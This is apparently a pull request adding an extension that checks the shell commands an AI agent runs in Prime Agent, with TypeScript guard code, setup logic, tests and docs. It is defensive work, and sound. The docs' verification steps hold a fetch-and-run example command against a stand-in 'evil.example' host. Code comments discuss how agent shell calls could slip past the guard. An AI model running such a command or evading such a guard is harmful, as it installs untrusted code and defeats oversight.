### PR TITLE
Add Prime Agent Guard integration + MCP

### DIFF
--- a/README.md
+++ b/README.md
@@ -634,6 +634,7 @@ tirith setup kiro                     # Kiro CLI (formerly Amazon Q)
 tirith setup pi-cli                   # Pi CLI
 tirith setup vscode                   # VS Code
 tirith setup windsurf                 # Windsurf
+tirith setup prime-agent --with-mcp   # Prime Agent + MCP server
 ```
 
 For manual configuration, see `mcp/clients/` for per-tool guides.

--- a/crates/tirith/assets/hooks/tirith-guard-prime-agent.ts
+++ b/crates/tirith/assets/hooks/tirith-guard-prime-agent.ts
@@ -36,10 +36,16 @@ function extractBashCommand(input: Record<string, unknown>): string | undefined 
     if (bashMatch) {
       return bashMatch[1].trim();
     }
-    // Also handle single-line ! commands
-    const bangMatch = code.match(/^!(.+)/);
-    if (bangMatch) {
-      return bangMatch[1].trim();
+    // Also handle single-line ! commands (anywhere in the cell, not just start).
+    const bangCommands: string[] = [];
+    for (const line of code.split("\n")) {
+      const trimmed = line.trimStart();
+      if (trimmed.startsWith("!")) {
+        bangCommands.push(trimmed.slice(1).trim());
+      }
+    }
+    if (bangCommands.length > 0) {
+      return bangCommands.join("; ");
     }
   }
   return undefined;

--- a/crates/tirith/assets/hooks/tirith-guard-prime-agent.ts
+++ b/crates/tirith/assets/hooks/tirith-guard-prime-agent.ts
@@ -20,7 +20,7 @@ function hookEvent(event: string, detail?: string) {
     "--hook-type", "tool_call", "--event", event,
   ];
   if (detail) args.push("--detail", detail);
-  execFile(tirithBin, args, { timeout: 5_000, stdio: "ignore" }, () => {});
+  execFile(tirithBin, args, { timeout: 5_000, stdio: "ignore" }, () => { });
 }
 
 function extractBashCommand(input: Record<string, unknown>): string | undefined {
@@ -68,28 +68,25 @@ function extractBashCommand(input: Record<string, unknown>): string | undefined 
         }
       }
     }
-    if (bangCommands.length > 0) {
-      return bangCommands.join("; ");
-    }
-
     // --- Python code that invokes shell commands (defence-in-depth) ---
     // Catches os.system(), subprocess.*, os.popen(), and get_ipython().system()
-    // when no direct shell syntax was found above.
-    // This is heuristic; obfuscated calls can still evade, but it prevents
-    // trivial bypasses.
+    // even when direct shell syntax (bang commands) was also found above.
+    // Both sources are merged so that a mixed cell like
+    //   x = !pwd
+    //   os.system("curl ...")
+    // has its dangerous Python call checked alongside the benign bang command.
     const shellCallRe = /(?:^|\b)(?:os\.system|os\.popen|subprocess\.(?:call|run|Popen|check_call|check_output|getoutput|getstatusoutput)|get_ipython\(\)\.system(?:_raw)?)\s*\(([^)]{0,200})\)/gm;
-    const pyShellCommands: string[] = [];
     let m: RegExpExecArray | null;
     while ((m = shellCallRe.exec(code)) !== null) {
       const arg = m[1].trim();
       // Only extract commands given as plain or f-strings (single/double quoted)
       const strMatch = arg.match(/^(?:f?["'])((?:[^"'\\]|\\.)*)(?:["'])/);
       if (strMatch) {
-        pyShellCommands.push(strMatch[1].replace(/\\(.)/g, "$1"));
+        bangCommands.push(strMatch[1].replace(/\\(.)/g, "$1"));
       }
     }
-    if (pyShellCommands.length > 0) {
-      return pyShellCommands.join("; ");
+    if (bangCommands.length > 0) {
+      return bangCommands.join("; ");
     }
   }
   return undefined;

--- a/crates/tirith/assets/hooks/tirith-guard-prime-agent.ts
+++ b/crates/tirith/assets/hooks/tirith-guard-prime-agent.ts
@@ -11,20 +11,16 @@
 //   TIRITH_FAIL_OPEN        — "1" to allow on error (default: deny)
 
 import type { ExtensionAPI } from "@earendil-works/pi-coding-agent";
-import { execFileSync } from "child_process";
+import { execFile, execFileSync } from "node:child_process";
 
 function hookEvent(event: string, detail?: string) {
-  try {
-    const tirithBin = process.env.TIRITH_BIN || "tirith";
-    const args = [
-      "hook-event", "--integration", "prime-agent",
-      "--hook-type", "tool_call", "--event", event,
-    ];
-    if (detail) args.push("--detail", detail);
-    execFileSync(tirithBin, args, { timeout: 5_000, stdio: "ignore" });
-  } catch {
-    // fire-and-forget telemetry
-  }
+  const tirithBin = process.env.TIRITH_BIN || "tirith";
+  const args = [
+    "hook-event", "--integration", "prime-agent",
+    "--hook-type", "tool_call", "--event", event,
+  ];
+  if (detail) args.push("--detail", detail);
+  execFile(tirithBin, args, { timeout: 5_000, stdio: "ignore" }, () => {});
 }
 
 function extractBashCommand(input: Record<string, unknown>): string | undefined {
@@ -155,6 +151,9 @@ function checkCommand(command: string): { block: boolean; reason?: string } {
 
 export default function (pi: ExtensionAPI) {
   pi.on("tool_call", async (event, _ctx) => {
+    // Only check bash and ipython tools
+    if (event.toolName !== "bash" && event.toolName !== "ipython") return undefined;
+
     // Extract bash command from either bash or ipython tool
     const command = extractBashCommand(event.input as Record<string, unknown>);
     if (!command) return undefined;

--- a/crates/tirith/assets/hooks/tirith-guard-prime-agent.ts
+++ b/crates/tirith/assets/hooks/tirith-guard-prime-agent.ts
@@ -1,0 +1,168 @@
+// Prime Agent extension: intercepts ipython/bash tool calls and runs tirith security check.
+//
+// Prime Agent uses IPython with %%bash cells instead of a direct bash tool.
+// This extension intercepts both:
+//   - ipython tool calls with %%bash cells
+//   - bash tool calls (if present)
+//
+// Environment:
+//   TIRITH_BIN              — path to tirith binary (default: "tirith")
+//   TIRITH_HOOK_WARN_ACTION — "allow" (default) or "deny"
+//   TIRITH_FAIL_OPEN        — "1" to allow on error (default: deny)
+
+import type { ExtensionAPI } from "@earendil-works/pi-coding-agent";
+import { execFileSync } from "child_process";
+
+function hookEvent(event: string, detail?: string) {
+  try {
+    const tirithBin = process.env.TIRITH_BIN || "tirith";
+    const args = [
+      "hook-event", "--integration", "prime-agent",
+      "--hook-type", "tool_call", "--event", event,
+    ];
+    if (detail) args.push("--detail", detail);
+    execFileSync(tirithBin, args, { timeout: 5_000, stdio: "ignore" });
+  } catch {
+    // fire-and-forget telemetry
+  }
+}
+
+function extractBashCommand(input: Record<string, unknown>): string | undefined {
+  // Direct bash tool: { command: "..." }
+  if (typeof input.command === "string" && input.command.trim()) {
+    return input.command;
+  }
+  // IPython tool with %%bash cell: { code: "%%bash\n..." }
+  if (typeof input.code === "string") {
+    const code = input.code;
+    // Check if it starts with %%bash
+    const bashMatch = code.match(/^%%bash\s*\n([\s\S]*)/);
+    if (bashMatch) {
+      return bashMatch[1].trim();
+    }
+    // Also handle single-line ! commands
+    const bangMatch = code.match(/^!(.+)/);
+    if (bangMatch) {
+      return bangMatch[1].trim();
+    }
+  }
+  return undefined;
+}
+
+function checkCommand(command: string): { block: boolean; reason?: string } {
+  const tirithBin = process.env.TIRITH_BIN || "tirith";
+
+  try {
+    execFileSync(
+      tirithBin,
+      ["check", "--json", "--non-interactive", "--shell", "posix", "--", command],
+      { timeout: 10_000, encoding: "utf-8", env: { ...process.env, TIRITH_INTEGRATION: "prime-agent" } },
+    );
+    // Exit 0 = clean, allow
+    hookEvent("check_ok");
+    return { block: false };
+  } catch (err: any) {
+    // execFileSync throws on non-zero exit or other errors
+    if (err.code === "ENOENT") {
+      hookEvent("binary_not_found");
+      if (process.env.TIRITH_FAIL_OPEN === "1") return { block: false };
+      return {
+        block: true,
+        reason: `tirith: ${tirithBin} not found — install tirith or set TIRITH_FAIL_OPEN=1`,
+      };
+    }
+
+    if (err.killed) {
+      hookEvent("timeout");
+      if (process.env.TIRITH_FAIL_OPEN === "1") return { block: false };
+      return { block: true, reason: "tirith: check timed out — blocked for safety" };
+    }
+
+    const exitCode: number | undefined = err.status;
+    if (exitCode == null) {
+      hookEvent("unexpected_exit", err.message || "unknown");
+      if (process.env.TIRITH_FAIL_OPEN === "1") return { block: false };
+      return {
+        block: true,
+        reason: `tirith: unexpected error — ${err.message || "unknown"}`,
+      };
+    }
+
+    const stdout: string = err.stdout || "";
+
+    // Unexpected exit code
+    if (exitCode !== 1 && exitCode !== 2) {
+      hookEvent("unexpected_exit", `exit code ${exitCode}`);
+      if (process.env.TIRITH_FAIL_OPEN === "1") return { block: false };
+      return {
+        block: true,
+        reason: `tirith: unexpected exit code ${exitCode} — blocked for safety`,
+      };
+    }
+
+    // Exit 2 = warn — check TIRITH_HOOK_WARN_ACTION
+    if (exitCode === 2) {
+      let warnAction = (process.env.TIRITH_HOOK_WARN_ACTION || "allow").toLowerCase();
+      if (warnAction !== "allow" && warnAction !== "deny") {
+        warnAction = "allow";
+      }
+      if (warnAction !== "deny") {
+        let warningText = "Tirith: security warnings detected (non-blocking)";
+        if (stdout.trim()) {
+          try {
+            const verdict = JSON.parse(stdout);
+            const findings: any[] = verdict.findings || [];
+            if (findings.length > 0) {
+              warningText = "Tirith warnings (non-blocking): " + findings.map((f: any) => {
+                const title = f.title || f.rule_id || "unknown";
+                const sev = f.severity || "";
+                return sev ? `[${sev}] ${title}` : title;
+              }).join("; ");
+            }
+          } catch { /* ignore parse errors */ }
+        }
+        hookEvent("warn_allowed");
+        process.stderr.write(warningText + "\n");
+        return { block: false };
+      }
+    }
+
+    // Exit 1 = block, Exit 2 + deny = block
+    hookEvent(exitCode === 1 ? "check_block" : "warn_denied");
+
+    // Build reason from tirith JSON output
+    let reason = "Tirith security check failed";
+    if (stdout.trim()) {
+      try {
+        const verdict = JSON.parse(stdout);
+        const findings: any[] = verdict.findings || [];
+        if (findings.length > 0) {
+          const parts = findings.map((f: any) => {
+            const title = f.title || f.rule_id || "unknown";
+            const severity = f.severity || "";
+            return severity ? `[${severity}] ${title}` : title;
+          });
+          reason = "Tirith: " + parts.join("; ");
+        }
+      } catch {
+        reason = stdout.trim().slice(0, 500);
+      }
+    }
+
+    return { block: true, reason };
+  }
+}
+
+export default function (pi: ExtensionAPI) {
+  pi.on("tool_call", async (event, _ctx) => {
+    // Extract bash command from either bash or ipython tool
+    const command = extractBashCommand(event.input as Record<string, unknown>);
+    if (!command) return undefined;
+
+    const result = checkCommand(command);
+    if (result.block) {
+      return { block: true, reason: result.reason };
+    }
+    return undefined;
+  });
+}

--- a/crates/tirith/assets/hooks/tirith-guard-prime-agent.ts
+++ b/crates/tirith/assets/hooks/tirith-guard-prime-agent.ts
@@ -31,21 +31,65 @@ function extractBashCommand(input: Record<string, unknown>): string | undefined 
   // IPython tool with %%bash cell: { code: "%%bash\n..." }
   if (typeof input.code === "string") {
     const code = input.code;
-    // Check if it starts with %%bash
-    const bashMatch = code.match(/^%%bash(?:\s+[^\n]*)?\n([\s\S]*)/);
-    if (bashMatch) {
-      return bashMatch[1].trim();
+    // --- Cell magics that execute shell scripts ---
+    // Match %%bash, %%sh, %%script sh, %%script bash (with optional flags)
+    const cellMagicRe = /^%%(?:bash|sh|script\s+(?:ba)?sh)(?:\s+[^\n]*)?\n([\s\S]*)/i;
+    const cellMatch = code.match(cellMagicRe);
+    if (cellMatch) {
+      return cellMatch[1].trim();
     }
-    // Also handle single-line ! commands (anywhere in the cell, not just start).
+
+    // --- Line-level shell escapes ---
+    //   !command          — direct shell escape
+    //   name = !command   — assignment capturing shell output
+    //   name = !!command  — assignment capturing SList
+    //   x, y = !command   — tuple unpacking from shell output
+    //   %sx command       — IPython system-capture line magic
+    //   %system command   — IPython system line magic
+    const assignmentRe = /^[a-zA-Z_\w]*(?:\s*,\s*[a-zA-Z_\w]*)*\s*=\s*!!?\s*(.+)/;
+    const lineMagicRe = /^%(?:sx|system)\s+(.*)/;
     const bangCommands: string[] = [];
     for (const line of code.split("\n")) {
       const trimmed = line.trimStart();
       if (trimmed.startsWith("!")) {
+        // Simple shell escape: !command
         bangCommands.push(trimmed.slice(1).trim());
+      } else if (/^%sx[\s\t]/.test(trimmed) || /^%system[\s\t]/.test(trimmed)) {
+        // IPython line magics that execute shell commands
+        const lm = trimmed.match(lineMagicRe);
+        if (lm) {
+          bangCommands.push(lm[1].trim());
+        }
+      } else {
+        // Assignment shell escape: name = !command  or  name = !!command
+        const m = trimmed.match(assignmentRe);
+        if (m) {
+          bangCommands.push(m[1].trim());
+        }
       }
     }
     if (bangCommands.length > 0) {
       return bangCommands.join("; ");
+    }
+
+    // --- Python code that invokes shell commands (defence-in-depth) ---
+    // Catches os.system(), subprocess.*, os.popen(), and get_ipython().system()
+    // when no direct shell syntax was found above.
+    // This is heuristic; obfuscated calls can still evade, but it prevents
+    // trivial bypasses.
+    const shellCallRe = /(?:^|\b)(?:os\.system|os\.popen|subprocess\.(?:call|run|Popen|check_call|check_output|getoutput|getstatusoutput)|get_ipython\(\)\.system(?:_raw)?)\s*\(([^)]{0,200})\)/gm;
+    const pyShellCommands: string[] = [];
+    let m: RegExpExecArray | null;
+    while ((m = shellCallRe.exec(code)) !== null) {
+      const arg = m[1].trim();
+      // Only extract commands given as plain or f-strings (single/double quoted)
+      const strMatch = arg.match(/^(?:f?["'])((?:[^"'\\]|\\.)*)(?:["'])/);
+      if (strMatch) {
+        pyShellCommands.push(strMatch[1].replace(/\\(.)/g, "$1"));
+      }
+    }
+    if (pyShellCommands.length > 0) {
+      return pyShellCommands.join("; ");
     }
   }
   return undefined;

--- a/crates/tirith/assets/hooks/tirith-guard-prime-agent.ts
+++ b/crates/tirith/assets/hooks/tirith-guard-prime-agent.ts
@@ -36,7 +36,7 @@ function extractBashCommand(input: Record<string, unknown>): string | undefined 
   if (typeof input.code === "string") {
     const code = input.code;
     // Check if it starts with %%bash
-    const bashMatch = code.match(/^%%bash\s*\n([\s\S]*)/);
+    const bashMatch = code.match(/^%%bash(?:\s+[^\n]*)?\n([\s\S]*)/);
     if (bashMatch) {
       return bashMatch[1].trim();
     }

--- a/crates/tirith/src/assets.rs
+++ b/crates/tirith/src/assets.rs
@@ -71,3 +71,8 @@ pub const NUSHELL_HOOK: &str = include_str!(concat!(
     env!("CARGO_MANIFEST_DIR"),
     "/assets/shell/lib/nushell-hook.nu"
 ));
+
+pub const PRIME_AGENT_GUARD_TS: &str = include_str!(concat!(
+    env!("CARGO_MANIFEST_DIR"),
+    "/assets/hooks/tirith-guard-prime-agent.ts"
+));

--- a/crates/tirith/src/cli/setup/mod.rs
+++ b/crates/tirith/src/cli/setup/mod.rs
@@ -35,6 +35,7 @@ mod run_impl {
         "kiro",
         "openclaw",
         "pi-cli",
+        "prime-agent",
         "vscode",
         "windsurf",
     ];
@@ -130,7 +131,7 @@ mod run_impl {
         let tirith_bin = resolve_tirith_bin(dry_run)?;
 
         // Most hook scripts are Python; codex/pi-cli/openclaw are not.
-        if tool != "codex" && tool != "pi-cli" && tool != "openclaw" {
+        if tool != "codex" && tool != "pi-cli" && tool != "prime-agent" && tool != "openclaw" {
             check_binary_on_path("python3", dry_run)?;
         }
 
@@ -164,6 +165,7 @@ mod run_impl {
             "kiro" => setup_kiro(&opts),
             "openclaw" => setup_openclaw(&opts),
             "pi-cli" => setup_pi_cli(&opts),
+            "prime-agent" => setup_prime_agent(&opts),
             "vscode" => setup_vscode(&opts),
             "windsurf" => setup_windsurf(&opts),
             _ => Err(unknown_tool_error(tool)),
@@ -173,7 +175,7 @@ mod run_impl {
     /// Resolve scope for a given tool, applying defaults and validation.
     pub(super) fn resolve_scope(tool: &str, scope: Option<&str>) -> Result<Scope, String> {
         match tool {
-            "claude-code" | "cursor" | "gemini-cli" | "kiro" | "openclaw" | "pi-cli" => {
+            "claude-code" | "cursor" | "gemini-cli" | "kiro" | "openclaw" | "pi-cli" | "prime-agent" => {
                 match scope {
                     Some("project") | None => Ok(Scope::Project),
                     Some("user") => Ok(Scope::User),
@@ -464,6 +466,10 @@ mod run_impl {
 
     fn setup_openclaw(opts: &SetupOpts) -> Result<(), String> {
         super::tools::setup_openclaw(opts)
+    }
+
+    fn setup_prime_agent(opts: &SetupOpts) -> Result<(), String> {
+        super::tools::setup_prime_agent(opts)
     }
 
     fn setup_pi_cli(opts: &SetupOpts) -> Result<(), String> {

--- a/crates/tirith/src/cli/setup/mod.rs
+++ b/crates/tirith/src/cli/setup/mod.rs
@@ -118,7 +118,7 @@ mod run_impl {
         force: bool,
         update_configs: bool,
     ) -> Result<(), String> {
-        // --with-mcp only applies to claude-code and gemini-cli.
+        // --with-mcp applies to claude-code, gemini-cli, and prime-agent.
         if with_mcp && tool != "claude-code" && tool != "gemini-cli" && tool != "prime-agent" {
             return Err(
                 "--with-mcp is only supported for claude-code, gemini-cli, and prime-agent (other tools register MCP automatically or don't support it)"

--- a/crates/tirith/src/cli/setup/mod.rs
+++ b/crates/tirith/src/cli/setup/mod.rs
@@ -119,9 +119,9 @@ mod run_impl {
         update_configs: bool,
     ) -> Result<(), String> {
         // --with-mcp only applies to claude-code and gemini-cli.
-        if with_mcp && tool != "claude-code" && tool != "gemini-cli" {
+        if with_mcp && tool != "claude-code" && tool != "gemini-cli" && tool != "prime-agent" {
             return Err(
-                "--with-mcp is only supported for claude-code and gemini-cli (other tools register MCP automatically or don't support it)"
+                "--with-mcp is only supported for claude-code, gemini-cli, and prime-agent (other tools register MCP automatically or don't support it)"
                     .into(),
             );
         }

--- a/crates/tirith/src/cli/setup/tools.rs
+++ b/crates/tirith/src/cli/setup/tools.rs
@@ -1420,4 +1420,125 @@ exit 64
             );
         });
     }
+
+    // ── setup_prime_agent tests ──────────────────────────────────────────
+
+    /// Project scope: guard written at .prime/agent/extensions/tirith-guard.ts
+    #[test]
+    fn setup_prime_agent_project_scope_writes_guard() {
+        with_fake_env(true, |_home, cwd| {
+            let cwd = cwd.expect("cwd set");
+            setup_prime_agent(&opts_for(Scope::Project)).unwrap();
+
+            let guard = cwd.join(".prime/agent/extensions/tirith-guard.ts");
+            assert!(
+                guard.exists(),
+                "guard at .prime/agent/extensions/tirith-guard.ts"
+            );
+
+            let content = std::fs::read_to_string(&guard).unwrap();
+            assert!(
+                content.contains("extractBashCommand"),
+                "guard content is the prime-agent guard script"
+            );
+        });
+    }
+
+    /// User scope: guard written at ~/.prime/agent/extensions/tirith-guard.ts
+    #[test]
+    fn setup_prime_agent_user_scope_writes_guard() {
+        with_fake_env(false, |home, _cwd| {
+            setup_prime_agent(&opts_for(Scope::User)).unwrap();
+
+            let guard = home.join(".prime/agent/extensions/tirith-guard.ts");
+            assert!(
+                guard.exists(),
+                "guard at ~/.prime/agent/extensions/tirith-guard.ts"
+            );
+        });
+    }
+
+    /// --with-mcp writes settings.json with MCP server config
+    #[test]
+    fn setup_prime_agent_with_mcp_writes_settings_json() {
+        with_fake_env(true, |_home, cwd| {
+            let cwd = cwd.expect("cwd set");
+            let mut opts = opts_for(Scope::Project);
+            opts.with_mcp = true;
+            opts.tirith_bin = "/usr/local/bin/tirith".to_string();
+            setup_prime_agent(&opts).unwrap();
+
+            let settings_path = cwd.join(".prime/agent/settings.json");
+            assert!(settings_path.exists(), "settings.json created");
+
+            let raw = std::fs::read_to_string(&settings_path).unwrap();
+            let v: serde_json::Value = serde_json::from_str(&raw).unwrap();
+            let server = &v["mcpServers"]["tirith"];
+            assert_eq!(server["type"], "stdio");
+            assert_eq!(server["command"], "/usr/local/bin/tirith");
+            assert_eq!(server["args"], serde_json::json!(["mcp-server"]));
+        });
+    }
+
+    /// --with-mcp user scope: settings.json at ~/.prime/agent/settings.json
+    #[test]
+    fn setup_prime_agent_user_scope_with_mcp_writes_settings() {
+        with_fake_env(false, |home, _cwd| {
+            let mut opts = opts_for(Scope::User);
+            opts.with_mcp = true;
+            setup_prime_agent(&opts).unwrap();
+
+            let settings_path = home.join(".prime/agent/settings.json");
+            assert!(
+                settings_path.exists(),
+                "settings.json at ~/.prime/agent/"
+            );
+
+            let raw = std::fs::read_to_string(&settings_path).unwrap();
+            let v: serde_json::Value = serde_json::from_str(&raw).unwrap();
+            assert!(
+                v["mcpServers"]["tirith"].is_object(),
+                "tirith MCP server registered"
+            );
+        });
+    }
+
+    /// --update-configs refreshes hooks without writing settings.json
+    #[test]
+    fn setup_prime_agent_update_configs_refreshes_hooks_only() {
+        with_fake_env(true, |_home, cwd| {
+            let cwd = cwd.expect("cwd set");
+            let mut opts = opts_for(Scope::Project);
+            opts.with_mcp = true;
+            opts.update_configs = true;
+            setup_prime_agent(&opts).unwrap();
+
+            let guard = cwd.join(".prime/agent/extensions/tirith-guard.ts");
+            assert!(guard.exists(), "guard refreshed");
+
+            let settings_path = cwd.join(".prime/agent/settings.json");
+            assert!(
+                !settings_path.exists(),
+                "settings.json NOT written in update-configs mode"
+            );
+        });
+    }
+
+    /// dry-run: nothing is written to disk
+    #[test]
+    fn setup_prime_agent_dry_run_writes_nothing() {
+        with_fake_env(true, |_home, cwd| {
+            let cwd = cwd.expect("cwd set");
+            let mut opts = opts_for(Scope::Project);
+            opts.dry_run = true;
+            opts.with_mcp = true;
+            setup_prime_agent(&opts).unwrap();
+
+            let prime_dir = cwd.join(".prime");
+            assert!(
+                !prime_dir.exists(),
+                "dry-run must not create any directories"
+            );
+        });
+    }
 }

--- a/crates/tirith/src/cli/setup/tools.rs
+++ b/crates/tirith/src/cli/setup/tools.rs
@@ -528,6 +528,77 @@ pub fn setup_pi_cli(opts: &SetupOpts) -> Result<(), String> {
     Ok(())
 }
 
+// Prime Agent extensions live in:
+//   - User scope: `~/.prime/agent/extensions/`
+//   - Project scope: `.prime/agent/extensions/`
+// With `--with-mcp`, also registers the tirith MCP gateway server in the
+// Prime Agent MCP settings file (`~/.prime/agent/settings.json` or `.prime/agent/settings.json`).
+pub fn setup_prime_agent(opts: &SetupOpts) -> Result<(), String> {
+    let home = home::home_dir().ok_or_else(|| "could not determine home directory".to_string())?;
+
+    let (target, scope_root) = match opts.scope {
+        Scope::Project => {
+            let cwd = std::env::current_dir().map_err(|e| format!("current_dir: {e}"))?;
+            (cwd.join(".prime").join("agent"), Some(cwd))
+        }
+        Scope::User => (home.join(".prime").join("agent"), Some(home.clone())),
+    };
+
+    fs_helpers::validate_target_dir(&target, scope_root.as_deref())?;
+
+    // Install the extension
+    let extensions_dir = target.join("extensions");
+    if !opts.dry_run {
+        std::fs::create_dir_all(&extensions_dir)
+            .map_err(|e| format!("create {}: {e}", extensions_dir.display()))?;
+    }
+
+    let guard_path = extensions_dir.join("tirith-guard.ts");
+    let guard_content = crate::assets::PRIME_AGENT_GUARD_TS;
+    fs_helpers::write_hook_script(&guard_path, guard_content, opts.force, opts.dry_run)?;
+
+    if opts.update_configs {
+        eprintln!();
+        eprintln!("tirith: Prime Agent hook scripts refreshed");
+        return Ok(());
+    }
+
+    // --with-mcp: register tirith gateway as MCP server in settings.json
+    if opts.with_mcp {
+        let settings_path = target.join("settings.json");
+        merge::merge_mcp_json(
+            &settings_path,
+            "tirith",
+            serde_json::json!({
+                "type": "stdio",
+                "command": opts.tirith_bin,
+                "args": ["mcp-server"],
+                "env": {}
+            }),
+            opts.force,
+            opts.dry_run,
+        )?;
+    }
+
+    if let Err(e) =
+        super::shell_profile::install_shell_hook(&opts.tirith_bin, opts.force, opts.dry_run)
+    {
+        eprintln!("tirith: WARNING: {e}");
+    }
+
+    eprintln!();
+    eprintln!("tirith: Prime Agent setup complete");
+    eprintln!("  Extension installed to: {}", guard_path.display());
+    if opts.with_mcp {
+        eprintln!(
+            "  MCP server registered in: {}",
+            target.join("settings.json").display()
+        );
+    }
+    eprintln!("  Run `tirith doctor` to verify your configuration.");
+    Ok(())
+}
+
 pub fn setup_openclaw(opts: &SetupOpts) -> Result<(), String> {
     let home = home::home_dir().ok_or_else(|| "could not determine home directory".to_string())?;
 

--- a/crates/tirith/src/main.rs
+++ b/crates/tirith/src/main.rs
@@ -974,7 +974,7 @@ Examples:
         #[arg(long)]
         scope: Option<String>,
 
-        /// Also register tirith MCP server (Claude Code and Gemini CLI)
+        /// Also register tirith MCP server (Claude Code, Gemini CLI, and Prime Agent)
         #[arg(long)]
         with_mcp: bool,
 

--- a/crates/tirith/src/main.rs
+++ b/crates/tirith/src/main.rs
@@ -964,9 +964,10 @@ Examples:
   tirith setup cursor
   tirith setup copilot-cli
   tirith setup kiro --scope user
-  tirith setup claude-code --dry-run")]
+  tirith setup claude-code --dry-run
+  tirith setup prime-agent --with-mcp")]
     Setup {
-        /// Tool to configure: claude-code, codex, copilot-cli, cursor, gemini-cli, kiro, openclaw, pi-cli, vscode, windsurf
+        /// Tool to configure: claude-code, codex, copilot-cli, cursor, gemini-cli, kiro, openclaw, pi-cli, prime-agent, vscode, windsurf
         tool: String,
 
         /// Scope: project (default for most tools) or user

--- a/mcp/clients/prime-agent.md
+++ b/mcp/clients/prime-agent.md
@@ -1,0 +1,138 @@
+# Tirith + Prime Agent Setup
+
+## How it works
+
+Prime Agent supports TypeScript extensions that intercept tool calls. Tirith
+registers a `tool_call` handler (`tirith-guard.ts`) that intercepts `bash`
+tool calls **and** IPython `%%bash` cells, runs `tirith check --json`
+synchronously, and returns either `undefined` (allow) or
+`{block: true, reason: string}` (deny).
+
+**Hook file:** `tirith-guard.ts`
+
+**Protocol:** `tool_call` event via `pi.on("tool_call", ...)`
+
+**Output contract:**
+- Allow: returns `undefined` (invisible to the agent)
+- Deny: returns `{block: true, reason: "..."}` (reason shown to agent)
+- Warn-allow: returns `undefined`, findings written to `process.stderr`
+
+**IPython awareness:** Prime Agent uses IPython with `%%bash` cells for shell
+execution. The guard extension parses `input.code` for `%%bash` cell blocks and
+`!` bang commands in addition to the standard `input.command` path used by
+direct bash tools. This means shell commands run inside `%%bash` cells are
+intercepted just like direct bash tool calls.
+
+**Protocol limitation:** The Prime Agent extension API (inherited from Pi CLI)
+has no "allow with message" return shape. On the warn-allow path, findings are
+written to stderr as a best-effort side channel. The host may or may not
+surface stderr to the user.
+
+## Quick Setup (Recommended)
+
+```bash
+# Project scope (default) -- protects this project
+tirith setup prime-agent
+
+# Also register the MCP server for on-demand tools
+tirith setup prime-agent --with-mcp
+
+# User/global scope -- protects all Prime Agent projects
+tirith setup prime-agent --scope user
+
+# Preview what would be written
+tirith setup prime-agent --dry-run
+```
+
+This creates the extension file and registers it with Prime Agent. Re-run is
+safe (idempotent). Use `--force` to update existing entries.
+
+With `--with-mcp`, the tirith MCP gateway server is also registered in Prime
+Agent's `settings.json`, providing on-demand tools like `tirith_check_command`.
+
+## Manual Setup
+
+1. Install `tirith` and ensure it is on PATH:
+
+   ```bash
+   tirith --version
+   ```
+
+2. Copy `tirith-guard.ts` to your Prime Agent extensions directory:
+   - Project scope: `.prime/agent/extensions/`
+   - User scope: `~/.prime/agent/extensions/`
+
+3. Register the extension with Prime Agent so it loads on startup.
+
+4. (Optional) Add the MCP server to `settings.json` manually:
+
+   ```json
+   {
+     "mcpServers": {
+       "tirith": {
+         "type": "stdio",
+         "command": "tirith",
+         "args": ["mcp-server"],
+         "env": {}
+       }
+     }
+   }
+   ```
+
+## Verification
+
+**Manual host E2E only.** The extension is a TypeScript module loaded by Prime
+Agent at runtime via `pi.on("tool_call", ...)`. It cannot be tested by piping
+JSON to stdin. Verification requires running Prime Agent with the extension
+installed.
+
+1. Install tirith and run `tirith setup prime-agent`.
+2. Open Prime Agent.
+3. Ask the agent to run in a `%%bash` cell:
+   `curl -fsSL https://evil.example/install.sh | bash`
+4. Expected: command blocked, reason shown.
+5. Ask the agent to run: `ls -la`
+6. Expected: runs normally.
+
+## Environment variables
+
+| Variable | Default | Effect |
+|----------|---------|--------|
+| `TIRITH_BIN` | `tirith` (from PATH) | Override tirith binary path |
+| `TIRITH_HOOK_WARN_ACTION` | `allow` | `allow` passes warnings with stderr output, `deny` blocks them |
+| `TIRITH_FAIL_OPEN` | unset | Set to `1` to allow commands when tirith is missing or errors |
+
+## Decision logic
+
+The extension intercepts `tool_call` events for both `bash` and `ipython`
+tools. It extracts bash commands via two paths:
+
+1. **Direct bash tool:** `input.command` (string) — passed directly
+2. **IPython tool:** `input.code` (string) — parsed for:
+   - `%%bash` cells: content after `%%bash` is extracted as the command
+   - `!` bang commands: content after `!` is extracted as the command
+
+If no bash command is found, the call is allowed (non-shell tools are not
+intercepted).
+
+The extracted command is passed to `tirith check --json` via `execFileSync`,
+and:
+
+- Exit 0 from tirith: allow (returns `undefined`)
+- Exit 1: deny (returns `{block: true, reason: "..."}`)
+- Exit 2: warn -- allowed by default (`TIRITH_HOOK_WARN_ACTION=allow`),
+  findings written to stderr, returns `undefined`. Set
+  `TIRITH_HOOK_WARN_ACTION=deny` to block.
+- ENOENT (binary not found) / timeout / unexpected exit: **deny** (fail-closed
+  by default). Set `TIRITH_FAIL_OPEN=1` for fail-open.
+
+## Notes
+
+- The extension uses `execFileSync` with a 10-second timeout.
+- Hook telemetry events are logged via `tirith hook-event` (fire-and-forget
+  via `execFile`).
+- No `python3` dependency -- the extension is pure TypeScript.
+- The extension import type references `@earendil-works/pi-coding-agent`
+  (the `ExtensionAPI` type used by Prime Agent).
+- Automated testing of this extension is not currently supported; use manual
+  host E2E verification.


### PR DESCRIPTION
This pull request adds support for Prime Agent to Tirith by introducing a new TypeScript extension that intercepts shell Commands (including both direct bash tool calls and IPython `%%bash` cells) and enforces security checks. It also adds CLI setup support for Prime Agent, including optional MCP gateway registration, with documentation.

stdio MCP's are sadly not yet supported by prime-agent (Only http), but the syntax likely won't change. I can obviously leave this out and add it at a later point if you require so.

**Prime Agent Integration**

- Added a new TypeScript extension (`tirith-guard-prime-agent.ts`) that intercepts both bash tool calls and IPython `%%bash` cells in Prime Agent, running `tirith check --json` to allow or block commands based on security findings. The extension handles warnings, errors, and environment-based overrides, and is installed automatically by the CLI. [[1]](diffhunk://#diff-cb82325010e75548a7e4a002112b9797fdeee80718dcbaa161bc83af56673f03R1-R168) [[2]](diffhunk://#diff-11e58fc562b596428133d043b5a2a846413e27fcf7cd80da8c079e70e95fa85bR74-R78) [[3]](diffhunk://#diff-dcf1742846be061a28fb0ae057a8c2eb5d395be7bdaee0822160bdc2fe9b8917R531-R601)

**CLI and Setup Enhancements**

